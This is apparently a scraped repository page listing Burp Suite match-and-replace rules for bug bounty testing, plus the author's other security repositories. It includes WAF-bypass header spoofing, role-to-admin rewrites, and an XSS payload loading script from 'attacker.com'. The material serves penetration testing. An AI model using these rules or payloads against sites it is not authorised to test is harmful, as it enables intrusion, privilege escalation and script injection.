daffainfo/match-replace-burp daffainfo/match-replace-burp

  • Stars
    star
    265
  • Rank 154,577 (Top 4 %)
  • Language
  • License
    MIT License
  • Created over 2 years ago
  • Updated about 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
daffainfo/match-replace-burp
github

daffainfo

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Useful "Match and Replace" burpsuite rules

Match Replace Burp

Useful Match and Replace BurpSuite Rules

Finding hidden buttons, forms, and other UI elements

Many websites contain hidden buttons, forms, and other UI elements like

<div aria-hidden="true"></div>
<div style="visibility: hidden;"></div>
<div style="display: none;"></div>
<script>document.getElementbyTagName("test").hidden=true</script>
<button type="button" disabled>test</button>
  • Show Hidden UI (1)

  • Show Hidden UI (2)

  • Change disable to enable

Changing false to true

Sometimes we can get hidden features by changing from false to true. The example:

  • Changing role from normal user to admin

  • Make email verified

Bypass WAF

Bypassing WAF by adding some headers

  • Adding X-Forwarded-Host: 127.0.0.1

Create another rule but change the header to:

X-Forwarded-Port: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Origin: null
Origin: Domain.attacker.com

Finding IDOR

By changing original user UUID to another UUID

Create another rule but change the type to "Request First Line"

Finding XSS

By adding some XSS payload into the request

  • Finding XSS on User-Agent

  • Finding XSS on Referer

  • Auto replace user input with XSS payload

So by just inputting the words xss_payload on the website it will be immediately replaced with "><script src=https://attacker.com></script> Change the XSS payload as you want

MISC

Some random match and replace rules

Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere

  • Help companies to identify your traffic and separate them from malicious traffic by adding a custom header

References:

Soon will be updated again

More Repositories

1

AllAboutBugBounty

All about bug bounty (bypasses, payloads, and etc)
5,029
star
2

all-about-apikey

Detailed information about API key / OAuth token (Description, Request, Response, Regex, Example)
234
star
3

Key-Checker

Go scripts for checking API key / access token validity
Go
207
star
4

Git-Secret

Go scripts for finding sensitive data like API key / some keywords in the github repository
Go
158
star
5

bash-bounty

Random Tools for Bug Bounty
Shell
134
star
6

bypass-403

Go script for bypassing 403 forbidden
Go
122
star
7

Oneliner-Bugbounty

A collection oneliner scripts for bug bounty
114
star
8

ctf-writeup

CTF Writeups
Python
106
star
9

my-nuclei-templates

Some contributions in the nuclei-templates repository
53
star
10

apiguesser-web

Simple website to guess API Key / OAuth Token
JavaScript
47
star
11

apiguesser

Go script to guess an API key / OAuth token found during pentest. CLI version of https://github.com/daffainfo/apiguesser-web/
Go
43
star
12

suricata-rules

Suricata rules that can detect a wide range of threats, including malware, exploits, and other malicious activity especially web application attacks
Python
22
star
13

vulnerable-web

Simple vulnerability labs that created using PHP and MySQL.
PHP
14
star
14

jawaban-toki

Jawaban pemrograman C dan C++ https://tlx.toki.id/
C++
12
star
15

vulnlabs

A simple vulnerable webapp created by PHP
CSS
12
star
16

nuclei-malware

Template to detect some malware
12
star
17

dns-lookup

DNS lookup using Go
Go
11
star
18

malpacks

Tools for Detecting Malicious Packages
Python
10
star
19

BugBountyTools-PHP

Bug bounty tools built in PHP to help penetration tester doing the job
PHP
7
star
20

mailspoof

Simple API to scans SPF, DMARC, DKIM records for issues that could allow email spoofing.
PHP
5
star
21

simple-php-captcha

Simple captcha dengan menggunakan PHP
PHP
4
star
22

complete-php-crud

PHP CRUD + Login and Register
PHP
4
star
23

OSINT

Checking social media accounts using username
Shell
4
star
24

daffainfo

My profile
4
star
25

notifier

Golang tool to send notifications to LINE app
Go
3
star
26

openxpki-installer

Simple bash script to install OpenXPKI on Debian
Shell
2
star
27

daffa.info

Personal website and blog made using Hugo and PaperMod theme
HTML
2
star
28

Coronavirus-Tracking-Web

Website info-corona.id
HTML
2
star
29

budgetku

Final Project for Mobile Device Programming Course
Java
2
star
30

daffainfo.github.io

Simple CV using HTML and CSS
HTML
1
star
31

pweb-3

Repository untuk mata kuliah pemrograman web
HTML
1
star
32

Info-Webinar

Webinar source code
HTML
1
star
33

Voelas-WordPress

Wordpress Themes Voelas
PHP
1
star
34

CVE

My CVE Publications
1
star